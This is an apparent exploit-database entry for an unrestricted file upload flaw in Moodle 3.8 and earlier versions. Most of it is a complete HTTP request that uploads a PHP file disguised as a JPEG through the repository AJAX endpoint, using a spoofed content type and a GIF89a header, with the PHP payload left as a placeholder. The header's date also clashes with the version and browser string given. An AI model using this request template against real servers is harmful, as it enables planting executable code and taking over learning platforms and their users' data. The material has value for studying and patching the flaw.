Moodle 3.8 - Unrestricted File Upload

# Exploit Title: Moodle 3.8 - Unrestricted File Upload
# Date: 2019-09-08
# Exploit Author: Sirwan Veisi
# Vendor Homepage: https://moodle.org/
# Software Link: https://github.com/moodle/moodle
# Version: Moodle Versions 3.8, 3.7, 3.6, 3.5, 3.4...
# Tested on: Moodle Version 3.8
# CWE : CWE-434

I found an Unrestricted Upload vulnerability for Moodle version 3.8 , that
allows the attacker to upload or transfer files of dangerous types.


Example exploitation request:

POST /repository/repository_ajax.php?action=upload HTTP/1.1
Host: VulnerableHost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------38898830537874132223151601680
Content-Length: 2763
Origin: https://VulnerableHost
Connection: close
Referer: https://VulnerableHost/user/files.php
Cookie: MoodleSession=bpn90khjdh7mq4phs8i9r0caai
Upgrade-Insecure-Requests: 1

-----------------------------38898830537874132223151601680
Content-Disposition: form-data; name="repo_upload_file";
filename="image.php"
Content-Type: image/jpeg

GIF89a;
<?php
[code here]
?>

-----------------------------